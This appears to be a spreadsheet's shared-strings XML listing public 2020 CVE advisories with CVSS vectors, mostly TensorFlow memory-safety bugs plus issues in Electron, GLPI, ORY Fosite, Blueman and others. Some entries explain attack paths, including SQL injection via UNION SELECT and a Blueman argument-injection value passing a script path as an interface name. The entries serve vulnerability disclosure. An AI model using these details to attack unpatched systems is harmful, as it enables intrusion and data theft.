    <t>CVE-2020-1519</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows UPnP Device Host Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1538.</t>
  </si>
  <si>
    <t>CVE-2020-15190</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, the `tf.raw_ops.Switch` operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor. However, the eager runtime traverses all tensors in the output. Since only one of the tensors is defined, the other one is `nullptr`, hence we are binding a reference to `nullptr`. This is undefined behavior and reported as an error if compiling with `-fsanitize=null`. In this case, this results in a segmentation fault The issue is patched in commit da8558533d925694483d2c136a9220d6d49d843c, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15191</t>
  </si>
  <si>
    <t>In Tensorflow before versions 2.2.1 and 2.3.1, if a user passes an invalid argument to `dlpack.to_dlpack` the expected validations will cause variables to bind to `nullptr` while setting a `status` variable to the error condition. However, this `status` argument is not properly checked. Hence, code following these methods will bind references to null pointers. This is undefined behavior and reported as an error if compiling with `-fsanitize=null`. The issue is patched in commit 22e07fb204386768e5bcbea563641ea11f96ceb8 and is released in TensorFlow versions 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15192</t>
  </si>
  <si>
    <t>In Tensorflow before versions 2.2.1 and 2.3.1, if a user passes a list of strings to `dlpack.to_dlpack` there is a memory leak following an expected validation failure. The issue occurs because the `status` argument during validation failures is not properly checked. Since each of the above methods can return an error status, the `status` value must be checked before continuing. The issue is patched in commit 22e07fb204386768e5bcbea563641ea11f96ceb8 and is released in TensorFlow versions 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15193</t>
  </si>
  <si>
    <t>In Tensorflow before versions 2.2.1 and 2.3.1, the implementation of `dlpack.to_dlpack` can be made to use uninitialized memory resulting in further memory corruption. This is because the pybind11 glue code assumes that the argument is a tensor. However, there is nothing stopping users from passing in a Python object instead of a tensor. The uninitialized memory address is due to a `reinterpret_cast` Since the `PyObject` is a Python object, not a TensorFlow Tensor, the cast to `EagerTensor` fails. The issue is patched in commit 22e07fb204386768e5bcbea563641ea11f96ceb8 and is released in TensorFlow versions 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15194</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, the `SparseFillEmptyRowsGrad` implementation has incomplete validation of the shapes of its arguments. Although `reverse_index_map_t` and `grad_values_t` are accessed in a similar pattern, only `reverse_index_map_t` is validated to be of proper shape. Hence, malicious users can pass a bad `grad_values_t` to trigger an assertion failure in `vec`, causing denial of service in serving installations. The issue is patched in commit 390611e0d45c5793c7066110af37c8514e6a6c54, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1."</t>
  </si>
  <si>
    <t>CVE-2020-15195</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, the implementation of `SparseFillEmptyRowsGrad` uses a double indexing pattern. It is possible for `reverse_index_map(i)` to be an index outside of bounds of `grad_values`, thus resulting in a heap buffer overflow. The issue is patched in commit 390611e0d45c5793c7066110af37c8514e6a6c54, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15196</t>
  </si>
  <si>
    <t>In Tensorflow version 2.3.0, the `SparseCountSparseOutput` and `RaggedCountSparseOutput` implementations don't validate that the `weights` tensor has the same shape as the data. The check exists for `DenseCountSparseOutput`, where both tensors are fully specified. In the sparse and ragged count weights are still accessed in parallel with the data. But, since there is no validation, a user passing fewer weights than the values for the tensors can generate a read from outside the bounds of the heap buffer allocated for the weights. The issue is patched in commit 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and is released in TensorFlow version 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15197</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.3.1, the `SparseCountSparseOutput` implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the `indices` tensor has rank 2. This tensor must be a matrix because code assumes its elements are accessed as elements of a matrix. However, malicious users can pass in tensors of different rank, resulting in a `CHECK` assertion failure and a crash. This can be used to cause denial of service in serving installations, if users are allowed to control the components of the input sparse tensor. The issue is patched in commit 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and is released in TensorFlow version 2.3.1.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-15198</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.3.1, the `SparseCountSparseOutput` implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the `indices` tensor has the same shape as the `values` one. The values in these tensors are always accessed in parallel. Thus, a shape mismatch can result in accesses outside the bounds of heap allocated buffers. The issue is patched in commit 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and is released in TensorFlow version 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15199</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.3.1, the `RaggedCountSparseOutput` does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the `splits` tensor has the minimum required number of elements. Code uses this quantity to initialize a different data structure. Since `BatchedMap` is equivalent to a vector, it needs to have at least one element to not be `nullptr`. If user passes a `splits` tensor that is empty or has exactly one element, we get a `SIGABRT` signal raised by the operating system. The issue is patched in commit 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and is released in TensorFlow version 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-1520</t>
  </si>
  <si>
    <t>CVE-2020-15200</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.3.1, the `RaggedCountSparseOutput` implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the `splits` tensor generate a valid partitioning of the `values` tensor. Thus, the code sets up conditions to cause a heap buffer overflow. A `BatchedMap` is equivalent to a vector where each element is a hashmap. However, if the first element of `splits_values` is not 0, `batch_idx` will never be 1, hence there will be no hashmap at index 0 in `per_batch_counts`. Trying to access that in the user code results in a segmentation fault. The issue is patched in commit 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and is released in TensorFlow version 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15201</t>
  </si>
  <si>
    <t>In Tensorflow before version 2.3.1, the `RaggedCountSparseOutput` implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the `splits` tensor generate a valid partitioning of the `values` tensor. Hence, the code is prone to heap buffer overflow. If `split_values` does not end with a value at least `num_values` then the `while` loop condition will trigger a read outside of the bounds of `split_values` once `batch_idx` grows too large. The issue is patched in commit 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and is released in TensorFlow version 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15202</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, the `Shard` API in TensorFlow expects the last argument to be a function taking two `int64` (i.e., `long long`) arguments. However, there are several places in TensorFlow where a lambda taking `int` or `int32` arguments is being used. In these cases, if the amount of work to be parallelized is large enough, integer truncation occurs. Depending on how the two arguments of the lambda are used, this can result in segfaults, read/write outside of heap allocated arrays, stack overflows, or data corruption. The issue is patched in commits 27b417360cbd671ef55915e4bb6bb06af8b8a832 and ca8c013b5e97b1373b3bb1c97ea655e69f31a575, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15203</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, by controlling the `fill` argument of tf.strings.as_string, a malicious attacker is able to trigger a format string vulnerability due to the way the internal format use in a `printf` call is constructed. This may result in segmentation fault. The issue is patched in commit 33be22c65d86256e6826666662e40dbdfe70ee83, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15204</t>
  </si>
  <si>
    <t>In eager mode, TensorFlow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1 does not set the session state. Hence, calling `tf.raw_ops.GetSessionHandle` or `tf.raw_ops.GetSessionHandleV2` results in a null pointer dereference In linked snippet, in eager mode, `ctx-&gt;session_state()` returns `nullptr`. Since code immediately dereferences this, we get a segmentation fault. The issue is patched in commit 9a133d73ae4b4664d22bd1aa6d654fec13c52ee1, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15205</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, the `data_splits` argument of `tf.raw_ops.StringNGrams` lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak contents of memory In the linked code snippet, all the binary strings after `ee ff` are contents from the memory stack. Since these can contain return addresses, this data leak can be used to defeat ASLR. The issue is patched in commit 0462de5b544ed4731aa2fb23946ac22c01856b80, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15206</t>
  </si>
  <si>
    <t>In Tensorflow before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, changing the TensorFlow's `SavedModel` protocol buffer and altering the name of required keys results in segfaults and data corruption while loading the model. This can cause a denial of service in products using `tensorflow-serving` or other inference-as-a-service installments. Fixed were added in commits f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d (both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier versions). However, this was not enough, as #41097 reports a different failure mode. The issue is patched in commit adf095206f25471e864a8e63a0f1caef53a0e3a6, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15207</t>
  </si>
  <si>
    <t>In tensorflow-lite before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, to mimic Python's indexing with negative values, TFLite uses `ResolveAxis` to convert negative values to positive indices. However, the only check that the converted index is now valid is only present in debug builds. If the `DCHECK` does not trigger, then code execution moves ahead with a negative index. This, in turn, results in accessing data out of bounds which results in segfaults and/or data corruption. The issue is patched in commit 2d88f470dea2671b430884260f3626b1fe99830a, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15208</t>
  </si>
  <si>
    <t>In tensorflow-lite before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, when determining the common dimension size of two tensors, TFLite uses a `DCHECK` which is no-op outside of debug compilation modes. Since the function always returns the dimension of the first tensor, malicious attackers can craft cases where this is larger than that of the second tensor. In turn, this would result in reads/writes outside of bounds since the interpreter will wrongly assume that there is enough data in both tensors. The issue is patched in commit 8ee24e7949a203d234489f9da2c5bf45a7d5157d, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15209</t>
  </si>
  <si>
    <t>In tensorflow-lite before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, a crafted TFLite model can force a node to have as input a tensor backed by a `nullptr` buffer. This can be achieved by changing a buffer index in the flatbuffer serialization to convert a read-only tensor to a read-write one. The runtime assumes that these buffers are written to before a possible read, hence they are initialized with `nullptr`. However, by changing the buffer index for a tensor and implicitly converting that tensor to be a read-write one, as there is nothing in the model that writes to it, we get a null pointer dereference. The issue is patched in commit 0b5662bc, and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-1521</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Speech Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1522.</t>
  </si>
  <si>
    <t>CVE-2020-15210</t>
  </si>
  <si>
    <t>In tensorflow-lite before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, if a TFLite saved model uses the same tensor as both input and output of an operator, then, depending on the operator, we can observe a segmentation fault or just memory corruption. We have patched the issue in d58c96946b and will release patch releases for all versions between 1.15 and 2.3. We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-15211</t>
  </si>
  <si>
    <t>In TensorFlow Lite before versions 1.15.4, 2.0.3, 2.1.2, 2.2.1 and 2.3.1, saved models in the flatbuffer format use a double indexing scheme: a model has a set of subgraphs, each subgraph has a set of operators and each operator has a set of input/output tensors. The flatbuffer format uses indices for the tensors, indexing into an array of tensors that is owned by the subgraph. This results in a pattern of double array indexing when trying to get the data of each tensor. However, some operators can have some tensors be optional. To handle this scenario, the flatbuffer model uses a negative `-1` value as index for these tensors. This results in special casing during validation at model loading time. Unfortunately, this means that the `-1` index is a valid tensor index for any operator, including those that don't expect optional inputs and including for output tensors. Thus, this allows writing and reading from outside the bounds of heap allocated arrays, although only at a specific offset from the start of these arrays. This results in both read and write gadgets, albeit very limited in scope. The issue is patched in several commits (46d5b0852, 00302787b7, e11f5558, cd31fd0ce, 1970c21, and fff2c83), and is released in TensorFlow versions 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1. A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that only operators which accept optional inputs use the `-1` special value and only for the tensors that they expect to be optional. Since this allow-list type approach is erro-prone, we advise upgrading to the patched code.</t>
  </si>
  <si>
    <t>CVE-2020-15212</t>
  </si>
  <si>
    <t>In TensorFlow Lite before versions 2.2.1 and 2.3.1, models using segment sum can trigger writes outside of bounds of heap allocated buffers by inserting negative elements in the segment ids tensor. Users having access to `segment_ids_data` can alter `output_index` and then write to outside of `output_data` buffer. This might result in a segmentation fault but it can also be used to further corrupt the memory and can be chained with other vulnerabilities to create more advanced exploits. The issue is patched in commit 204945b19e44b57906c9344c0d00120eeeae178a and is released in TensorFlow versions 2.2.1, or 2.3.1. A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that the segment ids are all positive, although this only handles the case when the segment ids are stored statically in the model. A similar validation could be done if the segment ids are generated at runtime between inference steps. If the segment ids are generated as outputs of a tensor during inference steps, then there are no possible workaround and users are advised to upgrade to patched code.</t>
  </si>
  <si>
    <t>CVE-2020-15213</t>
  </si>
  <si>
    <t>In TensorFlow Lite before versions 2.2.1 and 2.3.1, models using segment sum can trigger a denial of service by causing an out of memory allocation in the implementation of segment sum. Since code uses the last element of the tensor holding them to determine the dimensionality of output tensor, attackers can use a very large value to trigger a large allocation. The issue is patched in commit 204945b19e44b57906c9344c0d00120eeeae178a and is released in TensorFlow versions 2.2.1, or 2.3.1. A potential workaround would be to add a custom `Verifier` to limit the maximum value in the segment ids tensor. This only handles the case when the segment ids are stored statically in the model, but a similar validation could be done if the segment ids are generated at runtime, between inference steps. However, if the segment ids are generated as outputs of a tensor during inference steps, then there are no possible workaround and users are advised to upgrade to patched code.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-15214</t>
  </si>
  <si>
    <t>In TensorFlow Lite before versions 2.2.1 and 2.3.1, models using segment sum can trigger a write out bounds / segmentation fault if the segment ids are not sorted. Code assumes that the segment ids are in increasing order, using the last element of the tensor holding them to determine the dimensionality of output tensor. This results in allocating insufficient memory for the output tensor and in a write outside the bounds of the output array. This usually results in a segmentation fault, but depending on runtime conditions it can provide for a write gadget to be used in future memory corruption-based exploits. The issue is patched in commit 204945b19e44b57906c9344c0d00120eeeae178a and is released in TensorFlow versions 2.2.1, or 2.3.1. A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that the segment ids are sorted, although this only handles the case when the segment ids are stored statically in the model. A similar validation could be done if the segment ids are generated at runtime between inference steps. If the segment ids are generated as outputs of a tensor during inference steps, then there are no possible workaround and users are advised to upgrade to patched code.</t>
  </si>
  <si>
    <t>CVE-2020-15215</t>
  </si>
  <si>
    <t>Electron before versions 11.0.0-beta.6, 10.1.2, 9.3.1 or 8.5.2 is vulnerable to a context isolation bypass. Apps using both `contextIsolation` and `sandbox: true` are affected. Apps using both `contextIsolation` and `nodeIntegrationInSubFrames: true` are affected. This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.</t>
  </si>
  <si>
    <t>CVE-2020-15216</t>
  </si>
  <si>
    <t>In goxmldsig (XML Digital Signatures implemented in pure Go) before version 1.1.0, with a carefully crafted XML file, an attacker can completely bypass signature validation and pass off an altered file as a signed one. A patch is available, all users of goxmldsig should upgrade to at least revision f6188febf0c29d7ffe26a0436212b19cb9615e64 or version 1.1.0</t>
  </si>
  <si>
    <t>CVE-2020-15217</t>
  </si>
  <si>
    <t>In GLPI before version 9.5.2, there is a leakage of user information through the public FAQ. The issue was introduced in version 9.5.0 and patched in 9.5.2. As a workaround, disable public access to the FAQ.</t>
  </si>
  <si>
    <t>CVE-2020-15218</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In iTop before versions 2.7.2 and 3.0.0, admin pages are cached, so that their content is visible after deconnection by using the browser back button. This is fixed in versions 2.7.2 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-15219</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In iTop before versions 2.7.2 and 3.0.0, when a download error is triggered in the user portal, an SQL query is displayed to the user. This is fixed in versions 2.7.2 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-1522</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Speech Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1521.</t>
  </si>
  <si>
    <t>CVE-2020-15220</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In iTop before versions 2.7.2 and 3.0.0, two cookies are created for the same session, which leads to a possibility to steal user session. This is fixed in versions 2.7.2 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-15221</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In iTop before versions 2.7.2 and 3.0.0, by modifying target browser local storage, an XSS can be generated in the iTop console breadcrumb. This is fixed in versions 2.7.2 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-15222</t>
  </si>
  <si>
    <t>In ORY Fosite (the security first OAuth2 &amp; OpenID Connect framework for Go) before version 0.31.0, when using "private_key_jwt" authentication the uniqueness of the `jti` value is not checked. When using client authentication method "private_key_jwt", OpenId specification says the following about assertion `jti`: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not seem to check the uniqueness of this `jti` value. This problem is fixed in version 0.31.0.</t>
  </si>
  <si>
    <t>CVE-2020-15223</t>
  </si>
  <si>
    <t>In ORY Fosite (the security first OAuth2 &amp; OpenID Connect framework for Go) before version 0.34.0, the `TokenRevocationHandler` ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0</t>
  </si>
  <si>
    <t>CVE-2020-15224</t>
  </si>
  <si>
    <t>In Open Enclave before version 0.12.0, an information disclosure vulnerability exists when an enclave application using the syscalls provided by the sockets.edl is loaded by a malicious host application. An attacker who successfully exploited the vulnerability could read privileged data from the enclave heap across trust boundaries. To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to elevate user rights directly, but it could be used to obtain information otherwise considered confidential in an enclave, which could be used in further compromises. The issue has been addressed in version 0.12.0 and the current master branch. Users will need to to recompile their applications against the patched libraries to be protected from this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15225</t>
  </si>
  <si>
    <t>django-filter is a generic system for filtering Django QuerySets based on user selections. In django-filter before version 2.4.0, automatically generated `NumberFilter` instances, whose value was later converted to an integer, were subject to potential DoS from maliciously input using exponential format with sufficiently large exponents. Version 2.4.0+ applies a `MaxValueValidator` with a a default `limit_value` of 1e50 to the form field used by `NumberFilter` instances. In addition, `NumberFilter` implements the new `get_max_validator()` which should return a configured validator instance to customise the limit, or else `None` to disable the additional validation. Users may manually apply an equivalent validator if they are not able to upgrade.</t>
  </si>
  <si>
    <t>CVE-2020-15226</t>
  </si>
  <si>
    <t>In GLPI before version 9.5.2, there is a SQL Injection in the API's search function. Not only is it possible to break the SQL syntax, but it is also possible to utilise a UNION SELECT query to reflect sensitive information such as the current database version, or database user. The most likely scenario for this vulnerability is with someone who has an API account to the system. The issue is patched in version 9.5.2. A proof-of-concept with technical details is available in the linked advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15227</t>
  </si>
  <si>
    <t>Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.</t>
  </si>
  <si>
    <t>CVE-2020-15228</t>
  </si>
  <si>
    <t>In the `@actions/core` npm module before version 1.2.6,`addPath` and `exportVariable` functions communicate with the Actions Runner over stdout by generating a string in a specific format. Workflows that log untrusted data to stdout may invoke these commands, resulting in the path or environment variables being modified without the intention of the workflow or action author. The runner will release an update that disables the `set-env` and `add-path` workflow commands in the near future. For now, users should upgrade to `@actions/core v1.2.6` or later, and replace any instance of the `set-env` or `add-path` commands in their workflows with the new Environment File Syntax. Workflows and actions using the old commands or older versions of the toolkit will start to warn, then error out during workflow execution.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15229</t>
  </si>
  <si>
    <t>Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within `unsquashfs`, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for unprivileged (either installation or with `allow setuid = no`) run of Singularity when a user attempt to run an image which is a local SIF image or a single file containing a squashfs filesystem and is coming from remote sources `library://` or `shub://`. Image build is also impacted in a more serious way as it can be used by a root user, allowing an attacker to overwrite/create files leading to a system compromise, so far bootstrap methods `library`, `shub` and `localimage` are triggering the squashfs extraction. This issue is addressed in Singularity 3.6.4. All users are advised to upgrade to 3.6.4 especially if they use Singularity mainly for building image as root user. There is no solid workaround except to temporary avoid to use unprivileged mode with single file images in favor of sandbox images instead. Regarding image build, temporary avoid to build from `library` and `shub` sources and as much as possible use `--fakeroot` or a VM for that.</t>
  </si>
  <si>
    <t>CVE-2020-1523</t>
  </si>
  <si>
    <t>A tampering vulnerability exists when Microsoft SharePoint Server fails to properly handle profile data, aka 'Microsoft SharePoint Server Tampering Vulnerability'. This CVE ID is unique from CVE-2020-1440.</t>
  </si>
  <si>
    <t>exploits/linux/local/48963.txt</t>
  </si>
  <si>
    <t>Blueman &lt; 2.1.4 - Local Privilege Escalation</t>
  </si>
  <si>
    <t>CVE-2020-15230</t>
  </si>
  <si>
    <t>Vapor is a web framework for Swift. In Vapor before version 4.29.4, Attackers can access data at arbitrary filesystem paths on the same host as an application. Only applications using FileMiddleware are affected. This is fixed in version 4.29.4.</t>
  </si>
  <si>
    <t>CVE-2020-15231</t>
  </si>
  <si>
    <t>In mapfish-print before version 3.24, a user can use the JSONP support to do a Cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-15232</t>
  </si>
  <si>
    <t>In mapfish-print before version 3.24, a user can do to an XML External Entity (XXE) attack with the provided SDL style.</t>
  </si>
  <si>
    <t>CVE-2020-15233</t>
  </si>
  <si>
    <t>ORY Fosite is a security first OAuth2 &amp; OpenID Connect framework for Go. In Fosite from version 0.30.2 and before version 0.34.1, there is an issue in which an an attacker can override the registered redirect URL by performing an OAuth flow and requesting a redirect URL that is to the loopback adapter. Attackers can provide both custom URL query parameters to their loopback redirect URL, as well as actually overriding the host of the registered redirect URL. These attacks are only applicable in scenarios where the attacker has access over the loopback interface. This vulnerability has been patched in ORY Fosite v0.34.1.</t>
  </si>
  <si>
    <t>CVE-2020-15234</t>
  </si>
  <si>
    <t>ORY Fosite is a security first OAuth2 &amp; OpenID Connect framework for Go. In Fosite before version 0.34.1, the OAuth 2.0 Client's registered redirect URLs and the redirect URL provided at the OAuth2 Authorization Endpoint where compared using strings.ToLower while they should have been compared with a simple string match. This allows an attacker to register a client with allowed redirect URL https://example.com/callback. Then perform an OAuth2 flow and requesting redirect URL https://example.com/CALLBACK. Instead of an error (invalid redirect URL), the browser is redirected to https://example.com/CALLBACK with a potentially successful OAuth2 response, depending on the state of the overall OAuth2 flow (the user might still deny the request for example). This vulnerability has been patched in ORY Fosite v0.34.1.</t>
  </si>
  <si>
    <t>CVE-2020-15235</t>
  </si>
  <si>
    <t>In RACTF before commit f3dc89b, unauthenticated users are able to get the value of sensitive config keys that would normally be hidden to everyone except admins. All versions after commit f3dc89b9f6ab1544a289b3efc06699b13d63e0bd(3/10/20) are patched.</t>
  </si>
  <si>
    <t>CVE-2020-15236</t>
  </si>
  <si>
    <t>In Wiki.js before version 2.5.151, directory traversal outside of Wiki.js context is possible when a storage module with local asset cache fetching is enabled. A malicious user can potentially read any file on the file system by crafting a special URL that allows for directory traversal. This is only possible when a storage module implementing local asset cache (e.g Local File System or Git) is enabled and that no web application firewall solution (e.g. cloudflare) strips potentially malicious URLs. Commit 084dcd69d1591586ee4752101e675d5f0ac6dcdc fixes this vulnerability by sanitizing the path before it is passed on to the storage module. The sanitization step removes any directory traversal (e.g. `..` and `.`) sequences as well as invalid filesystem characters from the path. As a workaround, disable any storage module with local asset caching capabilities such as Local File System and Git.</t>
  </si>
  <si>
    <t>CVE-2020-15237</t>
  </si>
  <si>
    <t>In Shrine before version 3.3.0, when using the `derivation_endpoint` plugin, it's possible for the attacker to use a timing attack to guess the signature of the derivation URL. The problem has been fixed by comparing sent and calculated signature in constant time, using `Rack::Utils.secure_compare`. Users using the `derivation_endpoint` plugin are urged to upgrade to Shrine 3.3.0 or greater. A possible workaround is provided in the linked advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15238</t>
  </si>
  <si>
    <t>Blueman is a GTK+ Bluetooth Manager. In Blueman before 2.1.4, the DhcpClient method of the D-Bus interface to blueman-mechanism is prone to an argument injection vulnerability. The impact highly depends on the system configuration. If Polkit-1 is disabled and for versions lower than 2.0.6, any local user can possibly exploit this. If Polkit-1 is enabled for version 2.0.6 and later, a possible attacker needs to be allowed to use the `org.blueman.dhcp.client` action. That is limited to users in the wheel group in the shipped rules file that do have the privileges anyway. On systems with ISC DHCP client (dhclient), attackers can pass arguments to `ip link` with the interface name that can e.g. be used to bring down an interface or add an arbitrary XDP/BPF program. On systems with dhcpcd and without ISC DHCP client, attackers can even run arbitrary scripts by passing `-c/path/to/script` as an interface name. Patches are included in 2.1.4 and master that change the DhcpClient D-Bus method(s) to accept BlueZ network object paths instead of network interface names. A backport to 2.0(.8) is also available. As a workaround, make sure that Polkit-1-support is enabled and limit privileges for the `org.blueman.dhcp.client` action to users that are able to run arbitrary commands as root anyway in /usr/share/polkit-1/rules.d/blueman.rules.</t>
  </si>
  <si>
    <t>CVE-2020-15239</t>
  </si>
  <si>
    <t>In xmpp-http-upload before version 0.4.0, when the GET method is attacked, attackers can read files which have a `.data` suffix and which are accompanied by a JSON file with the `.meta` suffix. This can lead to Information Disclosure and in some shared-hosting scenarios also to circumvention of authentication or other limitations on the outbound (GET) traffic. For example, in a scenario where a single server has multiple instances of the application running (with separate DATA_ROOT settings), an attacker who has knowledge about the directory structure is able to read files from any other instance to which the process has read access. If instances have individual authentication (for example, HTTP authentication via a reverse proxy, source IP based filtering) or other restrictions (such as quotas), attackers may circumvent those limits in such a scenario by using the Directory Traversal to retrieve data from the other instances. If the associated XMPP server (or anyone knowing the SECRET_KEY) is malicious, they can write files outside the DATA_ROOT. The files which are written are constrained to have the `.meta` and the `.data` suffixes; the `.meta` file will contain the JSON with the Content-Type of the original request and the `.data` file will contain the payload. The issue is patched in version 0.4.0.</t>
  </si>
  <si>
    <t>CVE-2020-1524</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Speech Shell Components Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15240</t>
  </si>
  <si>
    <t>omniauth-auth0 (rubygems) versions &gt;= 2.3.0 and &lt; 2.4.1 improperly validate the JWT token signature when using the `jwt_validator.verify` method. Improper validation of the JWT token signature can allow an attacker to bypass authentication and authorization. You are affected by this vulnerability if all of the following conditions apply: 1. You are using `omniauth-auth0`. 2. You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow. The issue is patched in version 2.4.1.</t>
  </si>
